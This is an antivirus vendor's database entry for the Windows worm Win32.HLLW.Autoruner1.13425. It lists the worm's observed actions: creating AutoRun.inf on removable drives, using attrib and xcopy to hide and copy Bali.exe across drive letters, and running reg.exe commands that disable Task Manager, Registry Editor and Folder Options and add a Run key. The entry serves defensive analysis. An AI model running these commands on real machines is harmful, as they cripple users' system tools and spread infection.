Win32.HLLW.Autoruner1.13425
Added to the Dr.Web virus database:
2012-03-14
Virus description added:
2012-04-02
Technical Information
To ensure autorun and distribution:
Creates the following files on removable media:
- <Drive name for removable media>:\AutoRun.inf
Malicious functions:
To complicate detection of its presence in the operating system,
forces the system hide from view:
blocks execution of the following system utilities:
- Windows Task Manager (Taskmgr)
- Registry Editor (RegEdit)
Creates and executes the following:
- %TEMP%\1.tmp\b2e.exe %TEMP%\1.tmp\b2e.exe <Current directory> <Full path to virus>
Executes the following:
- <SYSTEM32>\attrib.exe +h +r q:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe q:\
- <SYSTEM32>\attrib.exe +h +r p:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe r:\
- <SYSTEM32>\attrib.exe +h +r s:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe s:\
- <SYSTEM32>\attrib.exe +h +r r:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe n:\
- <SYSTEM32>\attrib.exe +h +r m:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe m:\
- <SYSTEM32>\attrib.exe +h +r n:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe p:\
- <SYSTEM32>\attrib.exe +h +r o:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe o:\
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe t:\
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe y:\
- <SYSTEM32>\attrib.exe +h +r x:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe x:\
- <SYSTEM32>\attrib.exe +h +r y:\Bali.exe
- <SYSTEM32>\attrib.exe +h +r %a:\AutoRun.inf
- <SYSTEM32>\attrib.exe +h +r z:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe z:\
- <SYSTEM32>\attrib.exe +h +r u:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe u:\
- <SYSTEM32>\attrib.exe +h +r t:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe v:\
- <SYSTEM32>\attrib.exe +h +r w:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe w:\
- <SYSTEM32>\attrib.exe +h +r v:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe c:\
- <SYSTEM32>\taskkill.exe /im helpctr.exe
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /t reg_dword /v superHidden /d 00000001
- <SYSTEM32>\attrib.exe +h +r c:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe e:\
- <SYSTEM32>\attrib.exe +h +r <Drive name for removable media>:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe <Drive name for removable media>:\
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /t reg_dword /v DisableRegistryTools /d 00000001
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /f /t reg_sz /v RunBaLi /d %WINDIR%\addins\Bali.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\batfile.bat" "
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /t reg_dword /v DisableTaskMgr /d 00000001
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /t reg_dword /v Hidden /d 00000002
- <SYSTEM32>\reg.exe add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /t reg_dword /v NoFolderOptions /d 00000001
- <SYSTEM32>\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /f /t reg_dword /v NoFolderOptions /d 00000001
- <SYSTEM32>\attrib.exe +h +r e:\Bali.exe
- <SYSTEM32>\attrib.exe +h +r j:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe j:\
- <SYSTEM32>\attrib.exe +h +r i:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe k:\
- <SYSTEM32>\attrib.exe +h +r l:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe l:\
- <SYSTEM32>\attrib.exe +h +r k:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe g:\
- <SYSTEM32>\attrib.exe +h +r f:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe f:\
- <SYSTEM32>\attrib.exe +h +r g:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe i:\
- <SYSTEM32>\attrib.exe +h +r h:\Bali.exe
- <SYSTEM32>\xcopy.exe /c /v /k /r /h /y /n Bali.exe h:\
Modifies settings of Windows Explorer:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer] 'NoFolderOptions' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
Modifies file system :
Creates the following files:
- C:\AutoRun.inf
- %TEMP%\2.tmp\batfile.bat
- %TEMP%\1.tmp\b2e.exe
Miscellaneous:
Searches for the following windows:
- ClassName: '' WindowName: ''
欢迎下载
Dr.Web for Android
-
免费3个月
-
可使用所有保护组件
-
可在AppGallery/Google Pay延期
继续使用此网站意味着您同意我们使用Cookie文件和其他用于收集网站访问统计信息的技术手段。详细信息